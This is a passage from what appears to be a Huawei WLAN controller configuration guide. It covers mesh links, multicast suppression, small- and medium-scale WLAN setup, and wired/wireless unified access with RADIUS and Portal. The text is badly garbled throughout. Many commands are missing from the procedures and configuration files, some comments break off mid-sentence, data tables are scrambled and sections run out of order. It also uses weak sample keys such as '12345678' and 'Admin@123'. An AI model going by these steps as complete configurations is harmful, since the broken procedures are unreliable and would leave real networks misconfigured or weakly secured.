(M P ) (M P ) (M P P ) G E 0 /0 /2
G E 0 /0 /1
STA
S w itch A
S w itch
STA
A re a C A re a B A re a A
L2
n e tw o rk STA
: M e sh lin k
Data Plan
Before configuring the Mesh service, determine the types and MAC addresses of the APs
used as Mesh nodes. The following table provides the data plan for this example.
NOTE

AP Type MAC
AP1 AP6010DN-AGN 0046-4b59-1ee0
AP2 AP6010DN-AGN 0046-4b59-1d20
AP3 AP6010DN-AGN 0046-4b59-1d40
Table 15-36 Service data required for completing the configuration

VLAN Management VLAN: 100 None

Service VLAN: Wired interfaces of AP1 and AP3

l Area B: VLAN 102 must allow packets of VLANs to
which Area B and Area C belong.
l Area C: VLAN 103 and VLANs
104, 105, and 106 on wired
interfaces of AP3
AP Direct forwarding None

service
data
forwardin
g mode
IP VLANIF 100: 192.168.10.1/24 None

address of
the AC's
source
interface
AP region l AP region 101 for AP1 None

l AP region 102 for AP2
l AP region 103 for AP3
WMM Name: wp01 None

profile
Radio Name: rp01 and rp02 None

profile
Security l Name: sp01 Mesh links support only the security

profile l Security and authentication policy: policy using WPA2+PSK
WPA2+PSK authentication and CCMP
encryption.
l Authentication key: 12345678
In this example, the security profile
l Encryption mode: CCMP sp01 is also used for basic WLAN
encryption service. Select an appropriate
security policy for the WLAN
service in real world applications.
Traffic Name: tp01 None

profile
Mesh l Name: mesh01 All APs on a Mesh network must

profile l ID: ChinaNet01 have the same Mesh network ID.
Service l Name: ss02 None

set l SSID: ChinaSer02
ESS 2
l Service data forwarding mode:
direct forwarding

l Name: ss03 None

l SSID: ChinaSer03
ESS 3
l Service data forwarding mode:
direct forwarding
Mesh Name: mesh01 A Mesh whitelist specifies the MAC

whitelist addresses of nodes that are allowed
to connect to an AP. After a Mesh
whitelist is bound to a radio of an
AP, only the neighboring nodes with
the MAC addresses in the whitelist
can connect to the AP.
1. Configure the AC and SwitchA to implement Layer 2 connectivity between the AC,
SwitchA, and AP1.
2. Configure the Mesh function to enable AP2 and AP3 to connect to the AC through Mesh
links.
3. Configure the basic WLAN service to provide Internet access service for WLAN users in
Area A, Area B, and Area C.
Procedure
Step 1 Connect AP1 to the AC.
# Configure SwitchA. Add GE0/0/1 of SwitchA to management VLAN 100, set the PVID to
VLAN 100, and configure GE0/0/1 and GE0/0/2 to allow packets from VLAN 100 and
VLANs 102 to 106 to pass through.
NOTE
You are advised to configure port isolation on GE0/0/1 that connects SwitchA to AP1. If port isolation is not
configured, unnecessary packets are broadcast in the VLANs or WLAN users connected to different APs can
communicate with each other at Layer 2.
[SwitchA] vlan batch 100 102 to 106
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100 102 to 106
[SwitchA-GigabitEthernet0/0/1] port-isolate enable //If the isolation group
is not specified for an interface, the interface is added to isolation group 1.
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100 102 to 106

# Set the NAC mode to unified mode on the AC (default setting). Configure GE1/0/1 to allow
packets from VLAN 100 and VLANs 102 to 106 to pass through.
[HUAWEI] sysname AC
[AC] vlan batch 100 102 to 106
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100 102 to 106
Step 2 Configure AC to assign IP addresses to STAs and APs.

[AC] dhcp enable
[AC-Vlanif102] quit
[AC-Vlanif103] quit
[AC-Vlanif100] quit


AC ID to 1.

[AC] wlan
# Add the APs offline.

[AC-wlan-view] ap id 1 ap-type AP6010DN-AGN mac 0046-4b59-1ee0
[AC-wlan-ap-1] quit
[AC-wlan-ap-2] quit
[AC-wlan-ap-3] quit
# Configure the Ethernet interfaces that connect APs to SwitchA to allow packets from
VLAN102 to VLAN106 to pass through.
NOTE
If MPP Ethernet interfaces are not configured to allow packets carrying service VLAN tags to pass through,
communication fails.
[AC-wlan-ap-1] lineate-port gigabitethernet 0 vlan tagged 102 to 106
[AC-wlan-ap-1] quit
# Create AP regions 101, 102, and 103. An AC has a default AP region with the ID 0. AP
regions 101, 102, and 103 are used as an example here.


# Add AP1 to AP region 101, AP2 to AP region 102, and AP3 to AP region 103. By default,
an AP is added to region 0. This example adds the three APs to regions 101, 102, and 103
respectively.
[AC-wlan-ap-1] quit
[AC-wlan-ap-2] quit
[AC-wlan-ap-3] quit
Step 5 Configure Mesh parameters.
# Create a WMM profile named wp01 and retain the default settings in the profile.
[AC-wlan-view] wmm-profile name wp01 id 1
[AC-wlan-wmm-prof-wp01] quit
# Create a radio profile rp02, set the channel mode to fixed and retain the default settings for
other parameters, and bind the WMM profile wp01 to the radio profile. The default channel
mode is auto, but the fixed mode must be used in this example.
[AC-wlan-radio-prof-rp02] channel-mode fixed //The APs along the mesh link
must use the same channel, so the fixed mode is used here.
# Create a Mesh whitelist mesh01. By default, no Mesh whitelist is created. This example
uses Mesh whitelist mesh01 for the Mesh nodes.
[AC-wlan-view] mesh-whitelist name mesh01
[AC-wlan-mesh-whitelist-mesh01] peer ap mac 0046-4b59-1d20
[AC-wlan-mesh-whitelist-mesh01] peer ap mac 0046-4b59-1d40
[AC-wlan-mesh-whitelist-mesh01] peer ap mac 0046-4b59-1ee0 //Configure the
whitelists according to your needs. In this example, whitelists can be created
among three APs to ensure robustness of the mesh network, so the MAC addresses of
three APs are added to mesh01.
[AC-wlan-mesh-whitelist-mesh01] quit
# Create security profile sp01, set the security and authentication policy to WPA2-PSK, set
the authentication key to 12345678, and set the encryption mode to CCMP.
NOTE
On a WMN, the APs that connect to each other wirelessly support only security policy WPA2+PSK+CCMP.
[AC-wlan-view] security-profile name sp01
[AC-wlan-sec-prof-sp01] security-policy wpa2
[AC-wlan-sec-prof-sp01] wpa2 authentication-method psk pass-phrase cipher
12345678 encryption-method ccmp
[AC-wlan-sec-prof-sp01] quit
# Create a Mesh profile mesh01. Set the Mesh network ID to ChinaNet01, bind the security
profile sp01 to the Mesh profile, and retain the default settings of other parameters.
[AC-wlan-view] mesh-profile name mesh01
[AC-wlan-mesh-prof-mesh01] mesh-id ChinaNet01

[AC-wlan-mesh-prof-mesh01] security-profile name sp01

[AC-wlan-mesh-prof-mesh01] quit
Step 6 Configure a WLAN radio profile and WLAN-ESS interfaces.

# Create a radio profile rp01, retain the default settings in the profile, and bind it to the WMM
profile wp01.
[AC-wlan-view] quit
# Create WLAN-ESS interfaces.

[AC-Wlan-Ess2] quit
[AC-Wlan-Ess3] quit
Step 7 Configure a Mesh profile and service sets.

# Create a traffic profile named tp01 and retain the default settings in the profile.
[AC] wlan
[AC-wlan-view] traffic-profile name tp01
[AC-wlan-traffic-prof-tp01] quit

[AC-wlan-service-set-ss02] service-vlan 102 //Set the VLAN ID of service set
to 102. By default, the VLAN ID of service set is 1.

[AC-wlan-service-set-ss03] service-vlan 103 //Set the VLAN ID of service set
to 103. By default, the VLAN ID of service set is 1.
# Create a Mesh VAP on radio 1 of AP1 and set the role of radio 1 to MPP, and bind the Mesh
whitelist mesh01 and Mesh profile mesh01 to the radio.
[AC-wlan-radio-1/1] mesh-role mesh-portal
[AC-wlan-radio-1/1] mesh-whitelist name mesh01
[AC-wlan-radio-1/1] mesh-profile name mesh01
[AC-wlan-radio-1/1] channel 40mhz-plus 157 //Radios setting up a Mesh link
must use the same channel and bandwidth. This example uses 40 Mhz bandwidth and
channel 157.
# Create a Mesh VAP on radio 1 of AP2 and set the role of radio 1 to MP, and bind the Mesh
whitelist mesh01 and Mesh profile mesh01 to the radio. Create a service VAP on radio 0 of
AP2 and bind radio profile rp01 and service set ss02 to radio 0.

[AC-wlan-radio-2/1] mesh-role mesh-node
# Create a Mesh VAP on radio 1 of AP3 and set the role of radio 1 to MP, and bind the Mesh
whitelist mesh01 and Mesh profile mesh01 to the radio. Create a service VAP on radio 0 of
AP3 and bind radio profile rp01 and service set ss03 to radio 0.
[AC-wlan-radio-3/1] mesh-role mesh-node
Step 8 Configure AP's wired interfaces.

# Set parameters for the AP3 wired interface.
[AC-wlan-ap-3] lineate-port gigabitethernet 0 vlan tagged 104 to 106 //Add
the wired interface of AP3 to VLANs 104 to 106 in tagged mode.
[AC-wlan-ap-3] lineate-port gigabitethernet 0 mode endpoint //Set the
downlink wired interface of AP3 to the endpoint mode.
[AC-wlan-ap-3] quit
NOTE
After changing the working mode of AP wired interfaces, reset the APs to make the configurations take
effect.
Step 9 Deliver parameters to APs.

# The AP parameters configured on the AC take effect only after they are delivered to the
APs.
:y
:y
:y
# Run the display ap all command on the AC to check whether the status of APs is normal
and run the display mesh-link all command on the AC to check whether Mesh links have
been established. If the command output shows that APs are in normal state and displays
Mesh link information, APs have established Mesh links.
All AP information:

------------------------------------------------------------------------------
/Region
------------------------------------------------------------------------------
1 AP6010DN-AGN 0046-4b59-1ee0 0/101 normal ap-1
------------------------------------------------------------------------------
Total number: 3
[AC-wlan-view] display mesh-link all
----------------------------------------------------------------------
AP ID Radio ID Mesh-link ID WLAN ID Peer AP ID Mesh Role
----------------------------------------------------------------------
1 1 0 16 3 mesh-portal
1 1 1 16 2 mesh-portal
2 1 0 16 3 mesh-node
----------------------------------------------------------------------
Total: 6
----End
Configuration Files
#
sysname SwitchA
#
#
#
#
return

#
sysname AC
#
#
#
dhcp enable
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
#
interface Vlanif102
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif103
ip address 192.168.3.1 255.255.255.0
#


#
interface Wlan-Ess2
#
interface Wlan-Ess3
#
wlan
ap-region id 101
ap-region id 102
ap-region id 103
ap id 1 type-id 19 mac 0046-4b59-1ee0 sn 210235555310CC003587
region-id 101
ap id 2 type-id 19 mac 0046-4b59-1d20 sn 210235555310CC000094
region-id 102
ap id 3 type-id 19 mac 0046-4b59-1d40 sn 210235555310CC00AC69
region-id 103
lineate-port gigabitethernet 0 mode endpoint
wmm-profile name wp01 id 1
traffic-profile name tp01 id 0
security-profile name sp01 id 0
wpa2 authentication-method psk pass-phrase cipher %@%@QGZ2"N.FU!8XFIGcV\
{QFUWb
%@%@ encryption-method ccmp
wlan-ess 2
ssid ChinaSer02
service-vlan 102
wlan-ess 3
ssid ChinaSer03
service-vlan 103
mesh-profile name mesh01 id 0
mesh-id ChinaNet01
wmm-profile id 1
channel-mode fixed
wmm-profile id 1
mesh-whitelist name mesh01 id 0
peer ap mac 0046-4b59-1ee0
ap 1 radio 1
radio-profile id 1
mesh-role mesh-portal
mesh-whitelist id 0
mesh-profile id 0
ap 2 radio 0
radio-profile id 0
ap 2 radio 1
radio-profile id 1
mesh-whitelist id 0
mesh-profile id 0
ap 3 radio 0

radio-profile id 0
ap 3 radio 1
radio-profile id 1
mesh-whitelist id 0
mesh-profile id 0
#
return

Typical Configuration Examples Versions V200R009)
16 Typical WLAN-AC Configuration

(Applicable to Versions V200R009)
About This Chapter

16.2 Example for Configuring WLAN Services on a Small-Scale Network
16.3 Example for Configuring the WLAN Service on Medium- and Large-Scale Campus
Networks
16.4 Example for Configuring Unified Access for Wired and Wireless Users
16.5 Example for Configuring WLAN Services for a Wireless City Project (AC Bypass
Deployment, Portal Authentication)
16.6 Example for Configuring MAC Address Authentication on the Wireless Side
16.7 Example for Configuring Portal Authentication on the Wireless Side
16.8 Example for Configuring MAC Address-prioritized Portal Authentication
16.11 Example for Configuring the WLAN Service Using WDS Technology
16.12 Example for Configuring the WLAN Service Using Mesh Technology

16.1.1 Multicast Packet Suppression Is Not Configured, and A

Large Number of Low-Rate Multicast Packets Affect the Wireless
Network
Symptom
No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets, they
are usually sent at low rates. If a large number of such multicast packets are sent from the
network side, the air interfaces may be congested. You are advised to configure multicast
packet suppression to reduce impact of a large number of low-rate multicast packets on the
wireless network. Exercise caution when configuring the rate limit; otherwise, the multicast
services may be affected.
l In direct forwarding mode, you are advised to configure multicast packet suppression on
switch interfaces connected to APs.
l In tunnel forwarding mode, you are advised to configure multicast packet suppression on
WLAN-ESS interfaces of the AC.
Procedure
l Configure multicast packet suppression in direct forwarding mode.
a. Create the traffic classifier test and define a matching rule.
[SwitchA] traffic classifier test
[SwitchA-classifier-test] if-match destination-mac 0100-5e00-0000 mac-
address-mask ffff-ff00-0000 //Match the destination MAC address of
multicast packets.
[SwitchA-classifier-test] quit
b. Create the traffic behavior test, enable traffic statistics collection, and set the traffic
rate limit.
[SwitchA] traffic behavior test
[SwitchA-behavior-test] statistic enable
[SwitchA-behavior-test] car cir 100 //Set the rate limit to 100
kbit/s. If multicast services are available, you are advised to set the
[SwitchA-behavior-test] quit
c. Create the traffic policy test and bind the traffic classifier and traffic behavior to the
traffic policy.
[SwitchA] traffic policy test
[SwitchA-trafficpolicy-test] classifier test behavior test
[SwitchA-trafficpolicy-test] quit
d. Apply the traffic policy to inbound or outbound directions of interfaces.

[SwitchA-GigabitEthernet0/0/1] traffic-policy test inbound
[SwitchA-GigabitEthernet0/0/1] traffic-policy test outbound

l Configure multicast packet suppression in tunnel forwarding mode.

a. Create the traffic profile test and set the maximum traffic volume of multicast
packets in the profile.
[HUAWEI] sysname AC
[AC] wlan
[AC-wlan-view] traffic-profile name test
[AC-wlan-traffic-prof-test] traffic-optimize multicast-suppression
packets 100 //Set the maximum traffic volume of multicast packets to
100 pps. If multicast services are available, you are advised to set the
[AC-wlan-traffic-prof-test] quit
b. Bind the traffic profile to the VAP profile.
[AC-wlan-view] vap-profile name test
[AC-wlan-vap-prof-test] traffic-profile test
[AC-wlan-vap-prof-test] quit
----End
16.2 Example for Configuring WLAN Services on a Small-

Scale Network
Small-Scale WLAN Overview

A small-scale WLAN can be a small campus network independently deployed for a small- or
medium-sized enterprise, or a branch network. A small-scale WLAN requires only a few
network devices to serve a small range of users.
Configuration Notes
l In this example, the security policy is WPA2-PSK-AES. To ensure network security,
normally forwarded as long as the network between the AC and APs is added to the
management VLAN and service VLAN and the network between the AC and
upper-layer network is added to the service VLAN.

Configuration.


are
Versi
on
V200 S12700 V200R007C00:

AD9430DN-24, AD9430DN-12, R230D, R240D,
V200R006C20:
AD9430DN-24, AD9430DN-12, R230D, R240D
V200R006C10:
AP3030DN, AP2030DN
An enterprise has a small-scale branch network. The enterprise needs to deploy WLAN
services for mobile office so that its employees can access the enterprise internal network
anywhere and anytime.
As shown in Figure 16-1, the AC connects to APs through a PoE switch, and the PoE switch
provides power for APs. The WLAN service is configured on the AC, and delivered to APs.

In te rn e t
G E 1 /0 /2
VLAN 101
AC
G E 1 /0 /1
G E 0 /0 /2 VLAN 100
VLAN 100
PoE
S w itch A
G E 0 /0 /1
VLAN 100
AP
STA STA

Data Planning
Item Data
DHCP The AC functions as a DHCP server to assign IP addresses to the STAs and
server AP.
IP address 10.23.100.2-10.23.100.254/24
pool for the
AP
IP address 10.23.101.2-10.23.101.254/24
pool for
STAs
AC's source VLANIF 100: 10.23.100.1/24

interface
address
AP group l Name: ap-group1

l Referenced profile: VAP profile wlan-vap and regulatory domain profile
domain1
Regulatory l Name: domain1

domain l Country code: CN
profile

Item Data
SSID l Name: wlan-ssid

profile l SSID name: wlan-net
Security l Name: wlan-security

profile l Security policy: WPA2+PSK+AES
l Password: a1234567
VAP profile l Name: wlan-vap

l Forwarding mode: tunnel forwarding
l Service VLAN: VLAN 101
l Referenced profile: SSID profile wlan-ssid and security profile wlan-
security
1. Configure the AP, AC, Switch, and upstream device to implement Layer 2
interconnection.
AP.
3. Configure the AP to go online.
a. Create an AP group and add the AP to the group. The APs that require the same
configuration can be added to the group for unified configuration.
b. Configure AC system parameters, including the country code and source interface
used by the AC to communicate with the AP.
c. Configure the AP authentication mode and import the AP offline so that the AP can
go online properly.
4. Configure WLAN service parameters for STAs to access the WLAN.
Procedure


[HUAWEI] sysname AC

NOTE

VLANIF 101.
[AC-Vlanif100] quit
[AC-Vlanif101] quit

# Create an AP group and add the AP to the AP group.
[AC] wlan
e?[Y/N]:y
[AC-wlan-view] quit

# Import the AP offline on the AC and add the AP to AP group ap-group1. Assume that the
AP's MAC address is 60de-4476-e360. Configure a name for the AP based on the AP's

deployment location, so that you can know where the AP is deployed from its name. For
example, name the AP area_1 if it is deployed in Area 1.
NOTE
The default AP authentication mode is MAC address authentication. If the default settings are retained, you
do not need to run the ap auth-mode mac-auth command.
In this example, the AP6010DN-AGN is used and has two radios: radio 0 (2.4 GHz radio) and radio 1 (5 GHz
radio).
[AC] wlan
[AC-wlan-ap-0] quit
State field is displayed as nor, the AP goes online normally.
nor : normal [1]
----------------------------------------------------------------------------------
---
Uptime
----------------------------------------------------------------------------------
---
----------------------------------------------------------------------------------
---
Total: 1
# Create security profile wlan-security and set the security policy in the profile.
NOTE
In this example, the security policy is set to WPA2+PSK+AES and password to a1234567. In actual
situations, the security policy must be configured according to service requirements.
[AC-wlan-sec-prof-wlan-security] security wpa2 psk pass-phrase a1234567 aes //
Configure security policy WPA2+PSK+AES.
# Create SSID profile wlan-ssid and set the SSID name to wlan-net.
[AC-wlan-ssid-prof-wlan-ssid] ssid wlan-net //Set the SSID to wlan-net.
# Create VAP profile wlan-vap, set the data forwarding mode and service VLAN, and apply
the security profile and SSID profile to the VAP profile.
mode to tunnel.
[AC-wlan-vap-prof-wlan-vap] service-vlan vlan-id 101 //Set the VLAN ID to 101.
By default, the VLAN ID is 1.


# Bind VAP profile wlan-vap to the AP group and apply the profile to radio 0 and radio 1 of
the AP.
Step 6 Commit the configuration.


After the service configuration is complete, run the display vap ssid wlan-net command. If
Status in the command output is displayed as ON, the VAPs have been successfully created
on AP radios.
WID : WLAN ID
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
-------------------------------------------------------------------------------
Total: 2
Connect STAs to the WLAN with SSID wlan-net and enter the password a1234567. Run the
display station ssid wlan-net command on the AC. The command output shows that the
STAs are connected to the WLAN wlan-net.
---------------------------------------------------------------------------------
address
---------------------------------------------------------------------------------
e019-1dc7-1e08 0 area_1 1/1 5G 11n 46/59 -68 101
10.23.101.254
---------------------------------------------------------------------------------
Total: 1 2.4G: 0 5G: 1
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100
#
#
#
return


#
sysname AC
#
#
dhcp enable
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0
#
#
#
#
wlan
security wpa2 psk pass-phrase %^%#m"tz0f>~7.[`^6RWdzwCy16hJj/Mc!,}s`X*B]}A%^
%# aes
ssid wlan-net
forward-mode tunnel
radio 0
radio 1
ap-name area_1
ap-group ap-group1
#
return
16.3 Example for Configuring the WLAN Service on

Medium- and Large-Scale Campus Networks
Medium- and Large-Scale WLAN Overview

Medium and large campus WLANs are deployed in headquarters of large and medium
enterprises, branches of large enterprises, colleges and universities, and airports.

Configuration Notes
Configuration.


are
Versi
on
V200 S12700 V200R007C00:

AD9430DN-24, AD9430DN-12, R230D, R240D,
V200R006C20:
AD9430DN-24, AD9430DN-12, R230D, R240D
V200R006C10:
AP3030DN, AP2030DN
As shown in Figure 16-2, an enterprise's AC connects to the egress gateway Router of the
campus network and connects to APs through a PoE switch. The PoE switch provides power
to APs.
The enterprise requires a WLAN with SSID wlan-net so that users can access the enterprise
internal network from anywhere at any time. The Router needs to function as a DHCP server
to assign IP addresses on 10.23.101.0/24 to users and manage users on the AC.

Figure 16-2 WLAN service configuration networking on a medium-scale network
In te rn e t
R o u te r G E 2 /0 /0
G E 1 /0 /2 V L A N IF 1 0 2
VLAN 102 1 0 .2 3 .1 0 2 .1
AC
G E 1 /0 /1
G E 0 /0 /2 VLAN 100
VLAN 100
PoE
S w itch A
G E 0 /0 /1
VLAN 100
AP
STA STA

Data Planning
Item Data
DHCP The AC functions as the DHCP server to assign IP addresses to APs, and the
server router functions as the DHCP server to assign IP addresses to STAs.
IP address 10.23.100.2-10.23.100.254/24
pool for the
AP
IP address 10.23.101.3-10.23.101.254/24
pool for
STAs

interface
address

l Referenced profile: VAP profile wlan-vap and regulatory domain profile
domain1

profile

Item Data



security
1. Configure the AP, AC, and upstream device to implement network interconnection.
2. Configure the AC as a DHCP server to assign an IP address to the AP from an interface
IP address pool, configure the AC as a DHCP relay agent, and configure the Router
connected to the AC to assign IP addresses to STAs.
WLAN.
Procedure

[HUAWEI] sysname AC
[AC] vlan batch 100


[AC-Vlanif101] quit
[AC-Vlanif102] quit


STAs.

[AC] dhcp enable
[AC-Vlanif100] quit
[AC-Vlanif101] dhcp relay server-ip 10.23.102.1 //Set the DHCP server address
for DHCP relay to 10.23.102.1, which resides on Router.
[AC-Vlanif101] quit


[AC] wlan
e?[Y/N]:y
[AC-wlan-view] quit

NOTE
radio).
[AC] wlan
[AC-wlan-ap-0] quit
nor : normal [1]
----------------------------------------------------------------------------------
---
Uptime
----------------------------------------------------------------------------------
---
----------------------------------------------------------------------------------
---
Total: 1

NOTE


mode to tunnel.
the AP.

After the service configuration is complete, run the display vap ssid wlan-net command. If
Status in the command output is displayed as ON, the VAPs have been successfully created
on AP radios.
WID : WLAN ID
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
-------------------------------------------------------------------------------
Total: 2
Connect STAs to the WLAN with SSID wlan-net and enter the password a1234567. Run the
display station ssid wlan-net command on the AC. The command output shows that the
STAs are connected to the WLAN wlan-net.
---------------------------------------------------------------------------------
address
---------------------------------------------------------------------------------
e019-1dc7-1e08 0 area_1 1/1 5G 11n 46/59 -68 101
10.23.101.254

---------------------------------------------------------------------------------
Total: 1 2.4G: 0 5G: 1
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100
#
#
#
return

#
sysname Router
#
vlan batch 102
#
dhcp enable
#
ip pool sta
network 10.23.101.0 mask 255.255.255.0
#
interface Vlanif102
ip address 10.23.102.1 255.255.255.0
dhcp select global
#
#
ip route-static 10.23.101.0 255.255.255.0 10.23.102.2
#
return

#
sysname AC
#
#
dhcp enable
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0
dhcp select relay
#
interface Vlanif102
ip address 10.23.102.2 255.255.255.0
#

#
#
ip route-static 0.0.0.0 0.0.0.0 10.23.102.1
#
#
wlan
%# aes
ssid wlan-net
forward-mode tunnel
radio 0
radio 1
ap-name area_1
ap-group ap-group1
#
return
16.4 Example for Configuring Unified Access for Wired

and Wireless Users
Overview of Unified Access for Wired and Wireless Users

In real-world situations, both wired and wireless users need to access one network. For
example, the PCs and printers of a company connect to the network in wired mode, and
laptops and mobile phones wirelessly connect to the network. After the unified access for
wired and wireless users is configured on a network, the network allows access of both wired
and wireless users, and manages all the users in a unified manner.
Configuration Notes


Configuration.


are
Versi
on
V200 S12700 V200R007C00:

AD9430DN-24, AD9430DN-12, R230D, R240D,
V200R006C20:
AD9430DN-24, AD9430DN-12, R230D, R240D
V200R006C10:
AP3030DN, AP2030DN
A hospital needs to deploy a wired and a wireless network in the hospital building to meet
service requirements. To make management and maintenance easy, the administrator requires
that wired and wireless users be centrally managed on the AC, non-authentication and Portal
authentication be configured for the wired and wireless users respectively, and wireless users
roam under the same AC.
As shown in Figure 16-3, the AC connects to the egress gateway Router in the uplink
direction. In the downlink direction, the AC connects to and manages APs through S5700-1
and S5700-2 access switches. The S5700-1 and S5700-2 are deployed in the first and second
floors respectively. In each room, the AP2010DN is deployed to provide both wired and

wireless access. The AP5030DN is deployed in the corridor to provide wireless network
coverage. The S5700-1 and S5700-2 are PoE switches and directly provide power to
connected APs.
transparently transmit data at Layer 2, and all gateways are configured on the AC
The AC functions as the DHCP server to allocate IP addresses to APs, STAs, and PCs.
Figure 16-3 Networking diagram for configuring unified access for wired and wireless users
In te rn e t
R o u te r
G E 1 /0 /4 A g ile C o n tro lle r

G E 1 /0 /3
G E 1 /0 /1 G E 1 /0 /2
AC
G E 0 /0 /1 G E 0 /0 /1
S 5 7 0 0 -1 S 5 7 0 0 -2
G E 0 /0 /2 G E 0 /0 /4 G E 0 /0 /2 G E 0 /0 /4
G E 0 /0 /3 G E 0 /0 /3
A P101 A P102 A P103 A P201 A P202 A P203
Data Planning
AC GE1/0/1 100, 201 Connected to the

S5700-1

S5700-2

Agile Controller

egress gateway


Eth0/0/1 the S5700-1.
wired users.
AP101 and AP102
are AP2010DNs and
deployed in rooms
on the first floor to
provide wired and
wireless access.
AP103 - - AP103 is an
AP5030DN and
deployed in the
corridor on the first
floor to provide
wireless access.

Eth0/0/1 the S5700-2.
wired users.
AP201 and AP202
are AP2010DNs and
deployed in rooms
on the second floor
to provide wired and
wireless access.
AP203 - - AP203 is an
AP5030DN and
deployed in the
corridor on the
second floor to
provide wireless
access.



source interface

VAP profile wlan-vap1,
regulatory domain
profile domain1, and
radio profiles radio-2g
and radio-5g
l Name: ap-group2
regulatory domain
and radio-5g
Portal access profile l Name: portal1 -

l Referenced profile:
Portal server template
portal1
Authentication profile l Name: portal1 -

Portal access profile
portal1

l Country code: CN
AP wired port profile Name: wired1, wired2, -

wired3, or wired4
RRM profile Name: rrm1 -
Radio profile l Name: radio-2g or -

radio-5g
l Referenced profile: RRM
profile rrm1

l Security and
OPEN

l SSID: hospital-wlan

Traffic profile Name: traffic1 -
VAP profile l Name: wlan-vap1 Provides WLAN network

l SSID: hospital-wlan coverage for the first floor
of the building.
tunnel forwarding
101
security, SSID profile
wlan-ssid, authentication
profile portal1, and
traffic profile traffic1
l Name: wlan-vap2 Provides WLAN network

l SSID: hospital-wlan coverage for the second
floor of the building.
tunnel forwarding
102
DHCP server The AC functions as the -

DHCP server to allocate IP
addresses to APs, STAs, and
PCs.
AP gateway and IP address VLANIF100: -

pool range 10.23.100.1/24
10.23.100.2-10.23.100.254/
24

pool range of the wireless 10.23.101.1/24
users 10.23.101.2-10.23.101.254/
24
VLANIF102: -
10.23.102.1/24
10.23.102.2-10.23.102.254/
24


pool range of the wired 10.23.201.1/24
users 10.23.201.2-10.23.201.254/
24
VLANIF202: -
10.23.202.1/24
10.23.202.2-10.23.202.254/
24
Server parameters Authentication server: l The Service Controller

Controller provides
l Port number: 1812 RADIUS server and
l RADIUS shared key: Portal server functions;
Admin@123 therefore, IP addresses of
l IP address: 10.23.200.1 authorization server, and
l Port number: 1813 Portal server are all the
Authorization server: collect user login and
l IP address: 10.23.200.1 logout information. The
port numbers of the
l RADIUS shared key: authentication server and
Admin@123 accounting server must
Portal server: be the same as those of
the RADIUS server.
l Configure an
l Port number that the AC authorization server to
uses to listen on Portal enable the RADIUS
protocol packets: 2000 server to deliver
l Destination port number authorization rules to the
in the packets that the AC. The shared key of
AC sends to the Portal the authorization server
server: 50100 must be the same as
those of the
Admin@123
accounting server.
server: Admin@123



locations, and the working
AP102 Radio 0: channel 6 and channel and power of the
power level 10 AP radio. Set the channel
channel and power for each
Radio 1: channel 153 and AP.
power level 10

power level 10

power level 10

power level 10
power level 10
1. Configure all network devices to enable the APs, S5700-1, S5700-2, and AC to
2. Configure the AC as a DHCP server to assign IP addresses to APs, wired users, and
wireless users.
Internet.
Procedure
# Add interfaces GE0/0/1 to GE0/0/4 of the S5700-1 and S5700-2 to VLAN 100
(management VLAN), interfaces GE0/0/1 to GE0/0/4 of the S5700-1 to VLAN 201 (VLAN
for wired service packets), and interfaces GE0/0/1 to GE0/0/4 of the S5700-2 to VLAN 202
(VLAN for wireless service packets). Set PVIDs for interfaces directly connected to APs, and
you are also advised to configure port isolation on these interfaces to reduce broadcast

packets. The S5700-1 is used as an example here. The configuration on the S5700-2 is similar.
For details, see the configuration file of the S5700-2.
[S5700-1] vlan batch 100 201
[S5700-1-GigabitEthernet0/0/2] port-isolate enable //Configure port isolation
to reduce broadcast packets.
# On the AC, add GE1/0/1 connected to the S5700-1 to VLAN 100 and VLAN 201, GE1/0/2
connected to the S5700-2 to VLAN 100 and VLAN 202, GE1/0/4 connected to the upper-
layer network to VLAN 300, and GE1/0/3 connected to the Agile Controller to VLAN 200.
[HUAWEI] sysname AC
[AC] vlan batch 100 200 201 202 300
# Configure VLANIF 200 for communication between the AC and Agile Controller.
communication between the AC and Agile Controller.
[AC-Vlanif200] quit
Step 2 Configure the AC as a DHCP server to assign IP addresses to PCs, APs, and STAs.
# Configure the AC to assign IP addresses to PCs, APs, and STAs from an interface address
pool.
[AC] dhcp enable
addresses to APs.

[AC-Vlanif100] description manage_ap

[AC-Vlanif100] quit
addresses to STAs on the first floor.
[AC-Vlanif101] quit
addresses to STAs on the second floor.
[AC-Vlanif102] quit
addresses to PCs on the first floor.
[AC-Vlanif201] quit
addresses to PCs on the second floor.
[AC-Vlanif202] quit
[AC] radius-server template radius1 //Create the RADIUS server template radius1
address 10.23.200.2 weight 80 //Configure the RADIUS authentication server and
authentication port 1812. The AC uses the IP address 10.23.200.2 to communicate
with the RADIUS server.
10.23.200.2 weight 80 //Configure the RADIUS accounting server to collect user
login and logout information and set the accounting port number to 1813. The AC
uses the IP address 10.23.200.2 to communicate with the RADIUS server
[AC-radius-radius1] undo radius-server user-name domain-included //The user
name that the device sends to the RADIUS server does not carry the domain name.
Configure the command when the RADIUS server does not accept the user name with
the domain name.
[AC] radius-server authorization 10.23.200.1 shared-key cipher Admin@123 //
Configure an IP address for the RADIUS authorization server, set the shared key
to Admin@123, same as the authentication and accounting keys. Configure the
authorization server so that the RADIUS server can deliver authorization rules to
the AC.
[AC] aaa
radius1.
[AC-aaa-authen-radius1] authentication-mode radius //If the Agile Controller


scheme radius1.
radius1.
radius1.
[AC-aaa] quit
# Configure the Portal server.

[AC] web-auth-server portal1 //Create the Portal server template portal1.
the Portal server.
URL for a Portal server.
# Enable Portal authentication for wireless users, and configure non-authentication for wired
users.
[AC] portal-access-profile name portal1
[AC-portal-acces-profile-portal1] web-auth-server portal1 direct //Bind the
Portal server template portal1 and specify Layer 2 authentication as the Portal
authentication mode.
[AC-portal-acces-profile-portal1] quit
[AC] authentication-profile name portal1
